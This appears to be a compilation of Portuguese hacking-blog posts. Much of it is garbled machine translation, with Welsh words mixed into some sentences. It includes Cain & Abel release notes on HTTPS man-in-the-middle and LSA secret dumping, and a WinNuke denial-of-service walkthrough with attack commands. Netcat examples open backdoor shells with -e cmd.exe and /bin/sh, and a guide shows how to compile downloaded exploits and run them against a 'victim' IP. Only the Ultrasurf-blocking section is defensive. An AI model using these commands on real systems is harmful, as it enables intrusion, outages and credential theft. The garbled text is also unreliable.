– Suporte para MS-Outlook POP3 2002, IMAP, HTTP e senhas SMTP no armazenamento protegido Password Manager

Cain & Abel beta41 v2.5 para NT / 2000 / XP lançado
Novas características:
– Hashes LM criptoanálise via RainbowTables ordenados
Cain agora pode executar ataques de criptoanálise na hashes LM usando RainbowCracks de ordenados tabelas. Este tipo de ataque é muito rápido, mas só funciona em LM não hashes criptografada com um desafio. Para informações sobre a geração de tabelas do arco-íris e triagem por favor leia Tutorial do RainbowCrack
Cain & Abel beta40 v2.5 para NT / 2000 / XP lançado
Novas características:
– Cisco configuração Uploader
Cain agora podem fazer upload de arquivos de configuração para dispositivos Cisco via SNMP / TFTP. Este recurso funciona em roteadores e switches que suportam a OLD-CISCO-SYSTEM-MIB. servidor TFTP não é necessário.
– Bug e limpeza de código
Cain & Abel beta36 v2.5 para NT / 2000 / XP lançado
Novas características:
– NTLM Sessão Segurança Password Cracker
O cracker aguardada para autenticações NTLM sessão de segurança está finalmente disponível nesta versão. Agora, todo o tipo de LM, NTLM e hashes NTLMv2 com ou sem NTLMSSP encapsulamento são suportados e pode ser “Enviado para o Cracker” de dicionário e ataques de força bruta.
– IKE Aggressive Mode pré-compartilhada Chaves Cracker
O cracker funciona com o MD5 e SHA1 hashes.
– Filtro Sniffer para IKE modo agressivo pré-partilhada chaves autenticações
O sniffer recolhe todos os parâmetros necessários para quebrar uma chave pré-compartilhada usado em IKE autenticações modo agressivo (veja RFC-2409 para mais detalhes). O IKE-PSK sniffer / biscoito foi testado com sucesso usando um v4.0 cliente Cisco VPN e um Cisco PIX Firewall Versão 6.3 (1). Por favor, deixe-me saber seus resultados.
Cain & Abel beta34 v2.5 para NT / 2000 / XP lançado
Novas características:
– Cisco configuração Downloader
Cain agora podem baixar o arquivo de configuração de dispositivos Cisco via SNMP / TFTP. Este recurso funciona em roteadores e switches que suportam a OLD-CISCO-SYSTEM-MIB ou o novo CISCO-config-COPY-MIB. servidor TFTP não é necessário.
– Corrigindo erro
Cain & Abel classificado como um dos Top-75 Ferramentas de segurança
Graças a todos vocês lá fora, que votou a favor Cain & Abel como uma das ferramentas do Top-75 de segurança disponíveis. Para mais informações confira a lista completa aqui.
Cain & Abel v2.5 FAQ começou
Comecei a escrever um documento de perguntas frequentes sobre o programa. Você pode encontrá-lo na área de tópicos.
Cain & Abel beta29 v2.5 para NT / 2000 / XP lançado
Novas características:
– HTTPS automáticas Certificados Collector
O coletor agarra automaticamente certificados de servidores HTTPS e cria uma cópia falsa de-los localmente. Todos os parâmetros de certificado falso, exceto para as chaves públicas são os mesmos que os originais.
– HTTPS Man-in-the-Middle Sniffer para abril
O sniffer funciona na in-DUPLEX-modo completo de processamento de cliente e tráfego do servidor HTTPS. Ele faz uso de abril (Arp veneno Routing) para endereços IP e MAC do atacante pode ser totalmente falsificado do lado do cliente. O sniffer não pode descriptografar o tráfego HTTPS, se dirigiu para / de estação de trabalho do atacante.
– LSA Secrets Dumper (Cain agora pode despejar Secrets LSA a partir do registo utilizando a técnica de injeção de código LSASS)
– Filtro Sniffer para autenticações ICQ
– RADIUS Shared Chaves Cracker
– Manual do RADIUS senhas Sniffer / Decoder
– Filtro Sniffer para autenticações do MSN Messenger
– Filtro Sniffer para autenticações RADIUS
– Bug em filtros farejadores HTTP

Cain & Abel beta21 v2.5 para NT / 2000 / XP lançado
Novas características:
– RSA SecurID Calculadora Tokens
A calculadora produz tokens válidos, dado o número de série e a chave de ativação de um dispositivo RSA SecurID. Estes parâmetros são encontrados em arquivos de ativação do Token para tipicamente nomeada “something.ASC”.
– SSH-1 sniffer para abril
O sniffer funciona em full-duplex-MODE descriptografar o tráfego de cliente e servidor SSH-1.
Ele usa TAEG (Arp veneno Routing) para endereços IP e MAC do atacante pode ser totalmente falso e nunca expostos na rede. Abril e uma situação Man-in-the-Middle também é necessária por causa da criptografia assimétrica RSA utilizado na fase de SSH-1 da negociação. O sniffer suporta 3 algoritmos de criptografia simétrica: DES, 3DES e Blowfish. compressão Zlib não é suportado nesta versão. O sniffer não pode descriptografar SSH-1 tráfego se dirigiu para / de estação de trabalho do atacante. rebaixamento automático SSH-2 conexões para SSH-1 se a versão do servidor é v1.99. Um exemplo do arquivo de saída produzido a partir de uma sessão SSH-1 a um firewall Cisco PIX no meu ambiente de teste está disponível aqui.
– Scanner Promiscuous-Mode
O scanner tenta vários testes baseados em pacotes ARP não-padrão utilizando a mesma configuração de falsificação de abril
Ferramenta de Recuperação de Senha Cain & Abel parágrafo Sistemas Operacionais Microsoft Inferiores e. He permite uma Fácil Recuperação de Senhas POR sniffing Vários Tipos de rede, Senhas totalmente criptografadas Cracking Usando Dictionary, Brute-Force e Ataques de criptoanálise, gravar Conversas VoIP, decodificação embaralhada Senhas, Recuperar chaves de Rede sem fio, Revelando Caixas de Senha, Descobrindo Senhas em esconderijo e analisando Encaminhamento Protocolos.

O Programa NÃO vulnerabilidades de software erros OU Exploit unrhyw NÃO poderia tatuagem Fixo com o POUCO esforço. ELE Abrange OS Aspectos de Segurança rhai / Fraqueza da intrínseca safonau, a Autenticação do protocolo e cache de Mecanismos Métodos; -lo Magro inferior a Recuperação Simplificada de Senhas aceno de Cabeça e credenciais de varias Fontes, não entanto, also Navios rhai ‘NÃO Padrão’ utilitários para Usuários do Microsoft Windows.

Cain & Abel foi Uma tatuagem that datblygu na Esperança parágrafo Administradores de Rede bydd util, Professores Sobre os, consultores / Profissionais de Segurança, um forense Equipe, fornecedores de software de Segurança, testadores de penetração e de Todos os Outros proffesiynol tatuagem planiau ddefnyddio’r -lo POR Razões éticas,. O autor NÃO YN Ajudar OU APOIAR a Actividade ilegal Feito com este Programa unrhyw.

Ser tatuagem advertiu há uma possibilidade de tatuagem Damages chi yn Causa e / ou golled de Dados usando este software e em Nenhum Evento DEVE o autor tatuagem Responsável POR Aquilo ei Danos Ao Longo golled de Dados. Leia Atentamente o contrato de Licença incluido Neste E manual Antes da utilização do Programa.

GOSTOU SIGA O SITE

Derrubar a Conexao de Um Internauta

O exploit winnuke c explora uma bug existente no sistema de rede e do NT  Basicamente, o exploit se conecta na porta 139 e envia pacotes com “lixo” para dentro desta porta. Este ataque também é conhecido como ataque OOB (Out of Bounds) e derruba a conexão TCP/IP da máquina, exigindo que o sistema operacional seja reiniciado.

Para compilar o exploit é necessário corrigir os links quebrados do pacote kernel-headers do Conectiva Linux 7.0:

ln –sf /usr/src/linux-2.4.5/include/linux/ /usr/include/linux

ln –sf /usr/src/linux-2.4.5/include/asm /usr/include/asm

1

Depois obtenha o exploit winnuke.c

E prossiga descompactando o pacote:

unzip winnuke.zip

2

Finalmente, compile o exploit:

gcc  –o  winnuke  winnuke.c

3

Supondo que a máquina alvo seja uma estação Windows 95 com IP 192.168.0.6 verifique se ela está visível na rede:

ping  192.168.0.6  –c  4

4

Depois, teste o ataque usando o exploit conforme a linha a seguir:

./winnuke  192.168.0.6

5

CONSEQUÊNCIA DO ATAQUE EM MÁQUINAS COM WINDOWS

Após a execução do ataque, estações Windows apresentarão a tela azul da morte.

6

perdendo a conexão TCP/IP com a rede.

8

e exigindo que a máquina Windows  seja reiniciada para reestabelecer sua conexão TCP/IP com a rede:

CONSEQUÊNCIA DO ATAQUE EM MÁQUINAS COM NT 4

Após a execução do ataque, estações NT 4 apresentarão a tela de crash e serão reiniciadas automaticamente

9

PROTEGENDO O WINDOWS  CONTRA O ATAQUE DO WINNUKE

Para proteger seu sistema Windows  do ataque Winuke você deve instalar o patch fornecido pela Microsoft “Vtcpupd.exe

Depois do download, execute o programa “Vtcpupd.exe” e clique no botão “Sim” quando aparecer uma caixa de diálogo avisando que o programa irá atualizar o seu Driver TCP

Quando a instalação do patch for concluída, aparecerá a caixa de diálogo “Update Complete

Então, reinicie o Windows para a atualização fazer efeito

Depois, tente realizar um novo ataque contra a máquina atualizada

10

Observe na figura a seguir que o ataque não foi bem sucedido, pois, ainda é possível manter contato com a máquina alvo:

ping 192.168.0.6

11

Dessa forma, concluímos a demonstração da eficiência do patch vtcpupd.exe para corrigir a vulnerabilidade do Windows  contra o ataque do Winuke.

Para proteger o Windows NT  contra o ataque do winnuke, Instalando o último Service Pack no Windows NT.

 

Increva-se e siga o site

Enter your email address:

Delivered by FeedBurner

GOSTOU SIGA O SITE

Ultrasurf Desenvolvido Para os Chineses

ei que muito nego vai odiar esse post, mas sinto muito. Como administrador de rede, é fundamental para a empresa mantê-la em segurança. Com este ponto de vista, crio esse post para ajudar outros administradores e/ou curiosos de plantão.

O Ultrasurf é um software da UltraReach Internet Corp. desenvolvido para os chineses burlarem a censura que existe por lá. Acho admirável a iniciativa e os desenvolvedores merecem aplausos. Porém, aqui no mundo capitalista, a ordem é produção, logo, preciso evitar que alguns funcionários gastem seu tempo acessando Orkut e derivados.
O Ultrasurf é inteligente e pequeno, cerca de 100Kb. Ele abre várias conexões pela porta 443 a diferentes sites (proxy) e permite que Orkut ou qualquer página bloqueada pelo facebook seja acessada.

Temos duas formas de bloquear este carinha. Ou seja, ou você bloqueia todas portas e libera as necessarias ou bloqueia via hash no GPO do Windows .

Bloqueando pelo Squid

Caso você opte por bloquear pela primeira opção crie uma ACl no squid da seguinte forma:

  1. Use a política DROP no Iptables, bloqueando todas as portas e liberando o que era necessário.

    2. Fechei o acesso no Squid para todas as conexões SSL que eu não queria liberar, assim:

acl sitesssl url_regex -i “/etc/squid/sitesssl”
http_access deny SSL_ports !sitesssl

No arquivo /etc/squid/sitesssl estão os sites liberados, entre eles, bancos, gmail, hotmail, messenger.
Detalhe: NÃO funciona com proxy transparente.

Para saber se os usuários estão usando o Ultrasurf basta visualizar os relatórios de acesso. Caso apareçam muitas conexões pela porta 443 com um número significativo de IPs (não vai resolver nomes), o usuário está usando o programa.

Bloquenado no GPO do Windows

  1. Crie uma GPO para configurar apenas este recurso. O nome pode ser, por exemplo, COMPUTADORES: Bloqueio executável Ultrasurf.

  2. Edite a GPO atráves do comando GPEDIT.MSC no menu executar do Windows. 

  3. Na janela de edição da GPO, expanda Configurações do computador -> Configurações do Windows -> Configurações de segurança.

  4. Clique com o botão esquerdo do mouse para selecionar Diretivas de restrição de software.

  5. Clique com o botão direito em Diretivas de restrição de software e clique em Novas diretivas de restrição de software.

  6. Na pasta “Regras adicionais”, clique com o botão direito do mouse e selecione “Nova regra de hash…”.

  7. Na janela “Nova regra de hash”, clique no botão procurar e localize o executável do Ultrasurf. Confirme que a opção “Nível de segurança” esteja definida como “Não permitido” e clique no botão Ok para criar a nova regra de hash.

  8. Repita os passos 6 e 7 para cada versão do executável do Ultrasurf.

  9. Aplique a GPO apenas na Unidade Organizacional que contém os computadores dos usuários.

Infelizmente temos que criar uma nova regra de hash para cada versão do Ultrasurf, pois o hash do executável dele é diferente para cada versão.

Não esqueça as recomendações padrão no trato de GPOs:

  • Não altere as GPOs “Default domain policy” ou “Default domain controllers policy”.

  • Trabalhe com GPOs sempre no nível das Unidades Organizacionais para evitar erros de configuração em outros níveis do domínio.

  • Aplicada esta regra no Windows e você esteja em um dominio, a regra será aplicada para todo usuário do mesmo.

Bloquenado no GPO do Windows

  1. Iniciar, executar, gpedit.msc

  2. Expanda Configuração do Computador, configurações do Windows, configurações de segurança, Diretivas de restrição de software, regras adicionais.

  3. Clicar com o botão direito no lado direito do gpedit, nova regra de Hash, no hash de arquivo procurar o arquivo ou o executável que deseja bloquear, nível de segurança fica na opção não permitido.

  • Não esqueça que para cada versão do software, será necessário a criação de uma nova hash.

Procure sempre manter-se atualizado sobre novas versões deste software..

 

GOSTOU DIGITE SEU E-MAIL E SIGA O SITE

Netcat Comandos Trojan Brute Force

Vamos dar UMA olhada nsa Comandos fazer netcat, um -H exibe Opção como Opções do Programa. Basta DigiTar nc -h e dar enter.

Veremos OS principais Comandos fazer netcat:
l = Coloca Uma porta em estado de listenning (Escuta)
L = Coloca Uma porta em listenning (Escuta), reabrindo a porta Caso ELA feche
P = Definir porta Uma
V = Ativa o recebimento de eco
U = utiliza o protocolo UDP Ao inves de TCP
T = para se Conectar um TELNET
O = Gera hum log em formato hexadecimal
W = Determina hum reposta ritmo Máximo parágrafo aguardar Uma
Arquivos E = Redireciona
D = Coloca o netcat em Modo furtivo, OU SEJA, permanece Carregado em Memória.

Bem, Agora Que Já conhecemos OS Comandos Mais Usados do netcat vamos a pratica:

Colocando Uma porta em Escuta:

Nc -l -p 8080 ISSO Faria Com que o netcat colocasse a porta 8080 em Escuta, observe that foi USADO -v para quê fosse mostrado um SAÍDA fazer Programa na tela “escuta em [qualquer] 8080 …”, CASO uma Opção -v NÃO fosse inserida este texto NÃO seria mostrado.

Fazendo hum Port-Scanner com o netcat

nc -vv 127.0.0.1 1-6550 ISSO Faz hum do scanner da porta 1 à 6550 Mais Você TAMBÉM PODE selecionar As Portas Que deseja escanear Dando hum Espaço Entre OS Intervalos de Portas um Ser escaneados ex: nc -vv 127.0.0.1 21 80 23 79 25 ISSO faria UM NAS do scanner Portas 80, 23, 79 e 25.

Fazendo hum trojan com o netcat

Nota that basta redirecionar Todo o Tráfego de Uma porta Enviando um cmd.exe se para as janelas e bin / bash.sh se for UNIX uma sintaxe E um Seguinte em Sistemas janelas nc -l -p 1024 -e cmd.exe e nc -l -p 1024 -e bin / sh em UNIX.

Fazendo hum ataque de força bruta com o netcat
O canivete Suíço fazer TCP / IP MUITAS dez funcoes interessante Uma delas E força bruta o hum Exemplo: nc -vv 79 <c: \ usuarios.txt> c: \ log.txt, note that rápido Você precisara de hum Arquivos com Nome de Usuários em c: e log TODO Será, gravado em c: \ log.txt para quê rápido Você POSSA analisar DEPOIS. Esse Força bruta foi Feita Em Cima da porta 79 DEDO Mais poderia SER fácilmente adaptada uma OUTRAS Portas.

Fazendo hum sniffer com o netcat
O fantástico netcat TAMBÉM PODE SERVIR Como hum sniffer e captura TODO Tráfego em Uma Rede basta Colocar nc -vv -L 127.0.0.1 -p 80 nota that o L DEVE Ser maiúsculo pois, ESTA Opção reabre socketes Fechados, ISSO Fara Com que o netcat captura TODO Tráfego na porta 80 ACHO Que Nem e Mais necessario Dizer that also Podemos gravar Toda Saida em hum Arquivo TXT, Mais Bem Pra Você Que AINDA NÃO sacou uma Jogada ai vai nc -vv -L 127.0.0.1 -p 80> c: \ sniffer.txt

 

GOSTOU DIGITE SEU E-MAIL E SIGA O SITE

Compilando Exploits

Exploit é um código construído em C, VB, perl, etc.. que toma vantagem em cima de uma porta aberta de um sistema.
Este pequeno Tutorial mostrará a você, como compilar exploit usando o “cygwin”.

Seguindo os passos normais, será mostrado primeiramente como você poderá compilar o exploit usando um exploit direcionado para a porta 5000, mas claro, você poderá também fazer com exploits que exploram outras portas, lembrando que poderemos achar tais exploits usando os melhores sites da internet para esse fim:

– Google.com
– Securiteam.com
– K-otik.com
– Astalavista.box.sk
– Coromputer.net
– Securityfocus.com

Procure o exploit, como exemplo : “Exploit + a porta que o exploit trabalha”

Passo 1

Feito o download do exploit que trabalha na porta 5000, usualmente os exploits vem em arquivos .txt e você necessitará modifica-lo para .c, isto é super fácil… podendo apenas renomea-lo

Depois de ter feito o download e de ter extraído o exploit, você necessitará compila-lo, ou seja, covertê-lo para .exe.
Para compilar o exploit usaremos o programa “Cygwin”.

Faça o download do programa.

Passo 2

Depois de feito o download do programa “Cygwin”, instale-o conforme as imagens que seguem abaixo:

Passo 3

Depois de instalar o programa você necessitará compilar o exploit, coloque o exploit 5000.c dentro de C:\cygwin\bin
então abra o prompt (linha de comando), clicando em INICIAR –> EXECUTAR –> CMD
Dentro da janela do MS-DOS que se abrirá escreva:

CD c:\cygwin\bin
gcc 5000.c -o 5000.exe

caso tenha dúvidas quanto ao descrito acima, siga os passos conforme a imagem abaixo…

Passo 4

Depois que tiver finalizado a compilação do exploit poderemos usa-lo normalmente.
No nosso caso, iremos conectar ao micro da vítima usando a porta 5000, que no caso deverá estar aberta!

Abra novamente a janela de linha de comando (Prompt), clicando em INICIAR –> EXECUTAR –> CMD
então escreva:

CD c:\cygwin\bin
5000.exe XXX.XXX.XXX.XXX -e

XXX.XXX.XXX.XXX = endereço de IP da vítima)

caso tenha dúvidas quanto ao descrito acima,

Imagine que certo prédio é muito bem guardado e impede a entrada de qualquer suspeito. Um espião disfarçado de entregador consegue penetrá-lo com uma identidade falsa e, uma vez no lado de dentro, trata de desligar a energia geral para provocar uma grande distração. Aproveitando-se da desestrutura em todos os sistemas de segurança, os inimigos aproveitam a brecha para se infiltrar e invadir a construção. O nome deste espião é agente Exploit!

088

É claro que se trata de uma história ilustrativa, mas analogamente é isto que um Exploit faz. Aproveitando-se de uma brecha na segurança, ele entra em seu computador interpretado como dados inofensivos. Então estes dados provocam a instabilidade do sistema para diminuir temporariamente sua segurança. Finalmente o Exploit passa a executar ordens em seu sistema para roubar informações, invadir acessos bloqueados ou enviar um vírus.

Por definição, Exploit é qualquer programa, comando ou seqüência de dados que se aproveite da vulnerabilidade de um sistema para invadi-lo. Por vezes têm o intuito de prever as falhas do sistema, mas na maior parte dos casos seu objetivo é muito menos nobre.

Diferentes Tipos

O exemplo do espião é um dos métodos mais perigosos de infectar sua máquina com vírus e programas maliciosos. Ao contrário de outros meios contágio, um Exploit não precisa que o usuário clique em um determinado link ou execute algum arquivo. Desta maneira eles se tornam armas temíveis nas mãos dos hackers.

Também são chamados Exploits os comandos utilizados para burlar o uso limitado de softwares, neste caso conhecidos ainda como cracks. Um cracker é quem desenvolve estes furos nos programas, quase toda a pirataria se utiliza deste meio para obter acesso ilegal aos softwares.

É ISSO GOSTOU DEIXE SEU E-MAIL E SIGA O SITE